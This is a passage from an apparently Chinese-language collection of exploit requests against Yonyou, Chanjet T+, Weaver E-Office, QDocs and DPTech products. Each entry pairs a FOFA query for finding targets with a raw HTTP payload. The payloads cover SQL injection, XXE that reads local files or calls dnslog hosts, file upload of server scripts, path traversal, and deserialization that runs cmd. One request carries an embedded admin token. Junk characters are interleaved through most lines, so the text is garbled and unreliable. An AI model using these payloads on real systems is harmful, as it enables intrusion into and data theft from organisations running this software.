POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1- S- T W5 Y2 c8 o* z, l
Host: 203.25.218.166:8888
* }9 V7 [5 G- P) p1 b* a6 {. WUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
6 C& p% h" K5 p. g' i8 Q0 iAccept-Encoding: gzip, deflate9 T- v# U. l" j1 E1 v, U: ]/ P' M
Accept: */*
% g% ^) @. j' P* qConnection: close
! h% Z) S3 V9 G D# B. ~, S: taccessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA" F0 X2 m4 X" S) z
Content-Length: 190
9 V& K1 T- c9 B! i. f- rContent-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0; R4 C9 i- L7 L/ y) h/ a* Z
* p3 C3 L& J" @; ~5 l% O--fd28cb44e829ed1c197ec3bc71748df0
- ^* b; w8 k- P7 FContent-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"
* j1 R! N7 J, Y' T, D' Z9 |# Q* a# \( U0 ?8 S+ ^* g/ V+ @/ p
<%out.println(1111*1111);%>
& _+ @& O5 N8 s D" d, i--fd28cb44e829ed1c197ec3bc71748df0--- m- i3 g5 |% G7 F: u8 P( c
9 Y, h. E( l, r2 o) j& U- \- D5 Z# {9 x0 B
36. 用友NC-Cloud soapFormat XXE
$ W! B' F5 l9 w* _5 \1 U1 a- s* |2 uFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
+ }/ L G( ~; {2 {POST /uapws/soapFormat.ajax HTTP/1.1
. h& N- X/ @. @6 P9 }) QHost: 192.168.40.130:8989- a8 [. |4 B% }# i1 `$ B$ J# M
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
- u; c* w$ U2 O% dContent-Length: 263( N) Q! F: L2 G2 U
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
8 x8 |6 ~" T2 S& G5 XAccept-Encoding: gzip, deflate7 g( x7 k& H* S5 x' L7 ~; U
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.21 B2 d( ~- D7 I* ^
Connection: close
( W. O. ]8 U* ^9 ?: \( FContent-Type: application/x-www-form-urlencoded) y1 p5 ]& \ ~. e' C
Upgrade-Insecure-Requests: 1
; x& p/ `& h' F# Q; ~) w) V& C& J& @
4 J1 B+ v& L+ S m' a7 u& `5 F5 ~+ umsg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a) f! F) i% p' N) K' w4 Z" G
' [. B, N x; i8 X
2 h7 m8 r& K/ g5 j u37. 用友NC-Cloud IUpdateService XXE% {/ R, R2 M4 K& [( Q `, W1 I4 M
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
+ T% J# y9 Z$ @! LPOST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
- u9 K# _# u' m1 S0 ~3 z5 h6 h; w ]- HHost: 192.168.40.130:89891 k. ~6 }; c4 q6 l1 f) d3 l
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
( O5 y) l% z# G" |Content-Length: 421
/ [. s0 z$ l% bAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
3 L: i6 I0 R- B, hAccept-Encoding: gzip, deflate) {6 a$ V2 j. T; M1 ^. Z
Accept-Language: zh-CN,zh;q=0.9
& K+ {7 n. l& ^Connection: close
' K: W1 a# O0 E" RContent-Type: text/xml;charset=UTF-8- g, L3 q3 _8 m: D
SOAPAction: urn:getResult# z8 k9 b" {) z: \& D9 O3 P+ s
Upgrade-Insecure-Requests: 1- j4 O( U- |, D0 _; G
* v7 o* D# D1 \+ X/ g5 [<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">) n$ Y6 l. @- d
<soapenv:Header/>
3 z6 T: J- P Z5 e<soapenv:Body>% |7 a1 o) @+ Y) O/ o/ I( Z
<iup:getResult>3 H! j! t% P# u3 R0 M8 }6 d4 p/ |
<!--type: string-->
9 p! E1 D( p! c3 }- H<iup:string><![CDATA[
% j2 N0 l! S" s% T4 L! G9 @& C<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>1 f+ M# L4 v+ t: x* { ^
<xxx/>]]></iup:string>
2 _: e3 @/ @+ g$ f: u0 T</iup:getResult>
: m$ R: K$ E9 @</soapenv:Body>/ I2 E, U/ g5 }0 q) C
</soapenv:Envelope>
1 ]; ?9 O6 Q9 p9 k1 r/ R6 \5 u7 p7 W# I$ @
* |7 v- d1 f" }2 _
5 x! J# i( Z; ]( z. a. A38. 用友U8 Cloud smartweb2.RPC.d XXE, A9 L0 ]3 r' N( _; R$ c. O
FOFA:app="用友-U8-Cloud"
4 l% C9 @7 b/ ]& M6 T6 p, HPOST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
3 p3 ~; Y$ [9 R6 D* J* qHost: 192.168.40.131:8088
m; I5 F/ y6 q1 L4 R4 mUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.253 W$ @; ], A7 n) m
Content-Length: 260* K8 f8 h1 f7 f3 @& \- P# {
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b35 `/ k# q& M0 h* v& `
Accept-Encoding: gzip, deflate$ E' ?* b$ [# W
Accept-Language: zh-CN,zh;q=0.9
0 S5 m- {! a/ H: _5 ]6 AConnection: close
& L8 @0 v" k- m/ t( p6 P. h; DContent-Type: application/x-www-form-urlencoded
9 m8 Y; e& c% m/ I/ c8 n; x7 ~/ U$ N4 T: w* e$ _+ a8 ^
__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>9 e- R/ B$ ~/ s& i
# M6 ^ v$ o2 L) e' V- f
! i2 |+ v' I7 ]4 z6 K- Y' K: Y* ~39. 用友U8 Cloud RegisterServlet SQL注入* Q9 L% }8 A# V6 y3 @$ \
FOFA:title="u8c"' X6 K9 ?1 j* ^/ m, n) x2 m& S
POST /servlet/RegisterServlet HTTP/1.1
7 m O \1 N N7 ?9 @8 |* _Host: 192.168.86.128:8089
7 w0 Y( B0 x7 w% q4 s- c% JUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.361 {7 b2 X B4 z, a4 _. _5 L
Connection: close
& T2 y6 ?% r; E* v9 fContent-Length: 85) }$ L8 b3 u& E% j
Accept: */* ^. m0 l% w. _. |5 v0 X% {+ l
Accept-Language: en
$ R2 b4 g) ]' S& A5 u; r, EContent-Type: application/x-www-form-urlencoded+ M& f7 B1 W* `" x
X-Forwarded-For: 127.0.0.1
7 X8 w# t% x2 U3 dAccept-Encoding: gzip1 }, J+ H3 D* K4 Q
, _5 q, \3 {/ O+ d- V+ ^+ B7 ] _usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--4 i' G; p1 v9 `( j% R
5 o6 t2 y5 V* K$ N( ~' R3 s* R/ s r" M) Z* g
40. 用友U8-Cloud XChangeServlet XXE
0 B; ~% _& Q2 M/ v# `$ GFOFA:app="用友-U8-Cloud"+ `/ O! k# y7 p5 v0 J' A
POST /service/XChangeServlet HTTP/1.1
. j% _6 g# h) _) [; s rHost: x.x.x.x' |! R0 A6 F1 N4 x- a2 @
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.366 M! s1 C7 N# o. o$ f
Content-Type: text/xml$ T$ W; l) [" l. P7 Z$ ^
Connection: close
8 B# t0 r) X& c# n
0 i( B6 I! a/ B$ a: ~: R<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>. G7 _8 |; {( s* d# S' T3 S
~6 F" p7 h7 |
8 ?1 k9 i8 z9 u* G# }% `
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入" h& t l0 J- x1 x' D0 Q
FOFA:app="用友-U8-Cloud"
* N3 _' n; Y9 q0 R: I6 @8 O" iGET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.16 U' Z' m6 L( V+ v+ K6 G& L2 Y
Host:
2 H3 z) l* b/ x) A1 aUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
( l( W* L7 @0 S% I7 o4 ~9 j4 SContent-Type: application/json
5 J M# W+ K: ]8 WAccept-Encoding: gzip
4 b8 V/ z ^3 _5 Y& ?" {Connection: close! E! I2 L+ y6 ]# B5 g0 s$ T& m
, Q4 Y. C% @, w: F% m& P& S( _& q1 q+ }- K& y
42. 用友GRP-U8 SmartUpload01 文件上传- m0 [3 Z3 p( `1 N j
FOFA:app="用友-GRP-U8"3 v2 M! P) P% X& \6 v, X+ }
POST /u8qx/SmartUpload01.jsp HTTP/1.1 M! @) Q; d7 n8 B; y9 Z+ K
Host: x.x.x.x H7 ?# x9 s& o( i- t4 c7 C, k
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
5 O! ~/ v3 @2 W. pUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
& b. R, A+ V+ d+ I: L: j
3 N& M9 o$ t! MPAYLOAD. w& d! n0 I% e |4 p, L& g$ Q
+ D/ o$ ~, _4 L8 V) O- q
; `" R4 w/ c) W2 g" d6 m
http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml, u* G3 T4 h" g
( }( R' R* p; _3 R
43. 用友GRP-U8 userInfoWeb SQL注入致RCE6 y: F0 D! A2 i( o) I7 F- k! e. ~
FOFA:app="用友-GRP-U8"
4 o( A, [- ?) y# w ]POST /services/userInfoWeb HTTP/1.19 z6 v, L: D2 W' `" O# q( o* I9 S
Host: your-ip
$ C! c g' e' q% ?+ G$ J3 eUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36" e5 J4 Q8 ?8 _; {/ C8 c
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' Z$ w5 Z: ~! k
Accept-Encoding: gzip, deflate2 K9 b/ n# V) x! T
Accept-Language: zh-CN,zh;q=0.9
/ c! w# Q$ b# ?0 zConnection: close
, ]8 \4 c: @: t2 @4 k& _SOAPAction:
. o- S% B+ s/ q' U$ u2 IContent-Type: text/xml;charset=UTF-8, [( \9 {- N- T; y5 {
( S3 n+ A0 z8 v b3 c
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">$ |! r8 p, l5 a" G6 D
<soapenv:Header/>8 Q4 G7 @! C. U% \/ g' ]
<soapenv:Body>
6 }4 R# G9 h c <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
/ |/ U8 N( I3 g( c <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId> _- u( y: d. A8 x2 g
</ser:getUserNameById>* ?9 J* r9 Z: j& i& C0 `, v
</soapenv:Body>
' c0 n; t8 y6 c/ [+ }& e% v</soapenv:Envelope>
- @, f. k' w# M! l8 t1 V
# f- B, ?# o: s4 n3 f- j
# ~$ r5 [- T9 T r7 h44. 用友GRP-U8 bx_dj_check.jsp SQL注入
( \( Z7 d8 h" v" q `7 }FOFA:app="用友-GRP-U8"2 E0 B, F$ G% }! ^6 G* T
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
, ~: r c' U$ tHost: your-ip
2 ^- C+ \1 T( C, [User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36$ V2 b( _4 h, }. J
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
/ U @# A$ ?; b: _( }; tAccept-Encoding: gzip, deflate
$ T1 b& R+ C4 }! }" y) B9 v. ~1 r2 QAccept-Language: zh-CN,zh;q=0.9
* d; p$ E$ i# x7 n1 s3 n3 DConnection: close
) W4 H% u- R7 ~: \3 G
3 h* Z+ Y, s1 [0 i7 V
8 s* C; f$ D& I( V1 C0 K, l45. 用友GRP-U8 ufgovbank XXE; F3 e% U: |3 V, O) I+ o3 u7 v
FOFA:app="用友-GRP-U8"2 y2 l& a3 H6 B% t( w8 c7 E
POST /ufgovbank HTTP/1.1
/ n! r q; o# A% sHost: 192.168.40.130:222" c, q7 z& l r: l
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
' N3 Q! b! R$ O7 pConnection: close
0 H4 v/ V$ k0 n4 L5 M) RContent-Length: 161
: n4 B/ z8 N1 uAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
; P/ E2 K; A5 KAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.27 h6 n4 A$ [$ \+ G! u5 }& X3 i
Content-Type: application/x-www-form-urlencoded) G7 j6 ^4 u$ U- U4 m) v# Q& r
Accept-Encoding: gzip
: z: B9 L! E6 W! ]! F* B7 \' S9 `/ A
reqData=<?xml version="1.0"?>
4 U7 w/ L$ y2 y( x) J: N4 Z<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest
- |9 v1 M8 O) s$ S! W
9 ? f ?, r9 h8 M& D, |$ j* Y! D2 R5 w& C* Y5 N4 a. s1 a
46. 用友GRP-U8 sqcxIndex.jsp SQL注入 ^/ d0 G$ x% ?) T) ^6 j$ J
FOFA:app="用友-GRP-U8". P; m9 K# W4 b, Y
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
3 X# d! C2 ^* i. P! cHost: your-ip
6 ]' t7 Z; E# D' x+ e3 Q/ P3 z. yUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
# I" K3 N( z+ _7 b- J: }' s+ \Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
0 T- e# `( i1 J( P7 y$ x, vAccept-Encoding: gzip, deflate9 L5 X6 ^8 ^. T7 l4 x: x ?
Accept-Language: zh-CN,zh;q=0.9) A9 k. ~1 Y6 r7 e7 T8 b
Connection: close2 o8 p5 N# x( \0 Z; }+ |
0 t# u5 ^& z3 `9 R
& _3 @2 H" C7 e7 \' D$ W9 W
47. 用友GRP A++Cloud 政府财务云 任意文件读取- j3 @( b$ [2 ~* m, f: s0 e
FOFA:body="/pf/portal/login/css/fonts/style.css"/ k, B8 z7 g1 v( C
GET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1/ z. W7 x% {; ~' a( h, F$ X* j
Host: x.x.x.x2 }( n2 ~! d6 v: E
Cache-Control: max-age=0
0 K! i# ?% Q8 U8 ^. v2 X+ |: @Upgrade-Insecure-Requests: 1
8 o+ Y. k% c" vUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
* X4 [3 { q& _' y4 {Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
: Z* U5 Q$ Q# x" j, N$ m% R. TAccept-Encoding: gzip, deflate, br
, z$ J' _- I* R1 JAccept-Language: zh-CN,zh;q=0.9
+ L/ O9 ^# U9 x" C* o! F+ nIf-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT' U) Z8 m7 J' E
Connection: close. C4 h, C* e% ^* Z) W
0 Y. \$ ^0 M$ a
/ ?& K& b2 E' g$ Q8 T
) q; Z: y9 c9 b* }! x8 _
48. 用友U8 CRM swfupload 任意文件上传, O3 F7 X9 Z7 g
FOFA:title="用友U8CRM"% x4 `4 s5 e( I! S# D2 k/ ]& S# L
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
1 @, [& w1 t2 K- t5 T# k3 U6 QHost: your-ip! e- b. C" T3 W5 L) M$ |. d
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
; F3 L7 s' a4 X* CAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8% C* s7 @2 g) i) |' j
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2- |8 q- y- \ i5 B/ L
Accept-Encoding: gzip, deflate; A$ v! v( |! ?5 t* e2 J
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855* k5 c; c, E- m/ a2 _6 f( p$ v& m0 L1 |! O
------2695209672394068716424300668557 K; P6 A6 L& y* }; [. k
Content-Disposition: form-data; name="file"; filename="s.php"$ t2 ^3 T: v6 A0 f* @4 U5 |
1231
9 D3 m( Q$ y$ Z* F9 R2 RContent-Type: application/octet-stream
* _# Z, Q& h5 ]% j------269520967239406871642430066855
7 D4 Y1 C( B, V: L6 JContent-Disposition: form-data; name="upload"
( f" k }5 k- q6 K! b* vupload
- s8 K9 O& O* R( A4 @. r, ^------269520967239406871642430066855--
, Q4 ^8 ]% x- e, F" F% }0 ^+ k$ U$ r) s6 U5 M- f% Z
; J/ m2 Z' s8 @8 |5 p6 {9 |0 Y- q49. 用友U8 CRM系统uploadfile.php接口任意文件上传
- e/ h/ v- X$ K+ a" A* T# b" b7 p% RFOFA:body="用友U8CRM"
' B* K4 K- G4 b& _% n8 R
j) D3 }/ q3 T% K& dPOST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
" i4 |! ~& c i$ U+ EHost: x.x.x.x/ r) A& G, m: q7 i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
3 L- s( X0 e( Y/ uContent-Length: 329$ O7 y: ]& j/ i% e/ `
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
9 H* W% K. F3 p. R$ s f) P0 uAccept-Encoding: gzip, deflate& {7 R6 S% q/ ~5 T9 z4 Z
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
2 E$ E1 p3 }1 wConnection: close
0 K: M0 N5 w, W: Q) J, LContent-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w
9 C, ], z ]: Z8 d
% v3 w) V" H: N7 p1 b) s+ M) n-----------------------------vvv3wdayqv3yppdxvn3w( [! O- T3 c$ V5 L& K
Content-Disposition: form-data; name="file"; filename="%s.php "
) E# L* D1 j1 e6 [$ |Content-Type: application/octet-stream
3 ^% B) f; l$ ^4 `3 q. I: J/ n& S+ m$ W9 F9 ]/ z# f( v+ D: Y
wersqqmlumloqa3 z; @( N( c" J3 ~" C4 V+ d
-----------------------------vvv3wdayqv3yppdxvn3w
2 Y1 K/ E) u' |1 |* IContent-Disposition: form-data; name="upload"
r4 o% p! o: Y; s& \$ Z. Y% T1 q. d% l1 K+ F6 u/ x0 B& v
upload
( m5 w( U8 q' G/ @4 S: p-----------------------------vvv3wdayqv3yppdxvn3w--
3 a" ?0 T& g4 ~# O8 N
* ~7 t2 q) E- a( ?, Y6 t. [6 C: q1 Y! P4 Z: Y2 _2 G3 w; `
http://x.x.x.x/tmpfile/updB3CB.tmp.php# c( g7 Y5 @. k8 ]
1 Q6 a1 l' o h. x: P% r( x( x50. QDocs Smart School 6.4.1 filterRecords SQL注入
7 H6 u( P3 U KFOFA:body="close closebtnmodal"5 K. T& R+ P# I/ K- [
POST /course/filterRecords/ HTTP/1.18 Z( c% ^( J& P- W; v$ D$ Z
Host: x.x.x.x1 j9 y2 l5 z" F7 P0 W
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
( o" O. ?( r3 @' W( d3 D3 ~Connection: close6 P/ m/ t/ p/ H* c1 n2 z
Content-Length: 224- O4 Z" V: ^$ L! j
Accept: */*$ m( t6 T6 h6 K* V% e6 {5 C
Accept-Language: en
1 |7 l, m: B; |$ }- UContent-Type: application/x-www-form-urlencoded
. j- s2 g- b# i' R) z" v2 w1 B# cAccept-Encoding: gzip2 L# [5 e. h4 A
; e7 f/ u. c4 S
searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=15 d% j# ]* m& s0 f' a5 Z
$ ~' r; N- x+ H1 q( Q
; r* e, |$ l* s* e2 ^51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
2 N" Y, ^5 K& UFOFA:app="云时空社会化商业ERP系统"0 G3 B1 f) |. O
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
" h9 e# N& N9 h0 I1 }* EHost: your-ip
5 Z9 x Z2 C6 r5 d* SUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
6 H# g1 d0 H3 G" n. ?5 AAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9& Z( \' y7 P% I$ F
Accept-Encoding: gzip, deflate
$ |/ J/ [8 E# I$ q0 r4 H6 e5 cAccept-Language: zh-CN,zh;q=0.99 T' v, S. z" m
Connection: close
0 {* y" ^) @( ^) }, T% ~ E6 }6 f! C) R7 C' |. W, R- ]' U/ Q* p! }4 ^
" M) c" a7 }/ ?1 \& g$ r52. 泛微E-Office json_common.php sql注入
' P/ a7 \/ d8 |: Z( D9 eFOFA:app="泛微-EOffice"$ w) e7 z& E" W, U1 B
POST /building/json_common.php HTTP/1.1' Z* V+ A( Z+ C
Host: 192.168.86.128:8097
. x" K" h+ X. h9 j% @; EUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
# ~8 D8 {1 a2 s* O' fConnection: close
, Y: ]! z: S+ i# JContent-Length: 87$ X% v* U% N H" w% o0 \; N
Accept: */*1 J- h5 D# @' j. v
Accept-Language: en' f Q# T: b* g1 i3 T
Content-Type: application/x-www-form-urlencoded
: q8 P2 U. P9 w% b/ i2 i, l- g8 XAccept-Encoding: gzip: o; G) z/ N, k) D9 f1 `" `
' l g4 Y+ _# M6 N% _
tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333" g7 |" l# a( i% K: t$ i
4 ]$ q+ N) a; E. k, |
! w' E$ Y. N3 [) i% s; e E- Z, x53. 迪普 DPTech VPN Service 任意文件上传* l G! [5 j+ H+ M5 O" g
FOFA:app="DPtech-SSLVPN"( J% i' c. [4 ~$ X" y3 }5 I3 L
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd3 d- |7 ~* z: O: H. _8 M& F* U
: j+ F( Y# h% h( P$ B6 {. t. c# g
& n1 K7 ]" ^* G5 z54. 畅捷通T+ getstorewarehousebystore 远程代码执行/ y" Q a) d8 j9 \$ u0 g$ j. B4 @7 `
FOFA:app="畅捷通-TPlus"
- \5 z) x/ C& K7 z' C3 n: q第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件
% [6 \& z5 r7 r! X( E1 {"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"0 L. ]# |# h) K& T) {5 L
1 Z& K1 V; @6 F6 t+ D
9 m- L; e4 X. O% W3 O完整数据包
& _2 h5 Q6 k8 {1 Q" K! KPOST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1, e; K6 f# B3 S2 O
Host: x.x.x.x
* G! g% o. ~1 U" M! i9 H2 RUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F! {2 Y* ^% ?% n: d: \/ @
Content-Length: 593
E. k. C6 Z( ]% k# M
- a. v( N& E1 U1 S8 E{
5 ?' S5 T$ O: h. L7 a"storeID":{, h( P2 i- `. b
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
9 W- n1 _& J5 a& k+ u- Q: c "MethodName":"Start",
" F0 \- h9 C: D+ l6 w "ObjectInstance":{
* V, Z' W0 t0 V* j6 T* ^ "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",3 s$ ?+ i: U6 T* b
"StartInfo":{
/ A G+ e6 X9 f" p "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
; q' D0 k, h9 d; v" f7 y% j "FileName":"cmd",, O# e7 ~7 W9 \% J T
"Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
. q7 q1 D8 s6 A2 z6 N }, ^3 W9 Z8 |5 g0 m0 Y0 H, D3 k0 D
}
5 n0 C' j: c, E }, y- _% D, C9 O+ R2 o0 ~6 s8 L
}
8 |) a+ N0 ^5 P0 B$ i! Z$ D
1 |0 |% k+ W. @8 b+ g) @: a
2 \# p+ `' d5 |; K+ g第二步,访问如下url# o' j6 V8 q& M8 x
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt0 ~2 @5 \" e! r0 \1 I4 O
& n2 B ?9 }9 h2 l. q
" G2 H1 A0 {9 m3 S/ z% r55. 畅捷通T+ getdecallusers信息泄露. ^2 Z% C0 s5 k4 ?: t7 Z M5 }
FOFA:app="畅捷通-TPlus"
- B4 `7 Y3 \1 p* w. d第一步,通过
! c# j' k8 Y. z7 }0 U1 T$ T/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie3 K) u' ]# K+ P. `
第二步,利用获取到的Cookie请求 x6 S9 Q" {) [; |
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers c$ K* |/ q$ j* d' K) H& K
5 y0 D; Q2 Y; o) d" u
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
) _7 Y: q/ T# i" f* c8 nFOFA: app="畅捷通-TPlus"
2 U; B: h9 ]' @* j6 i! EPOST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.10 J. i2 R/ z* f A7 @. B
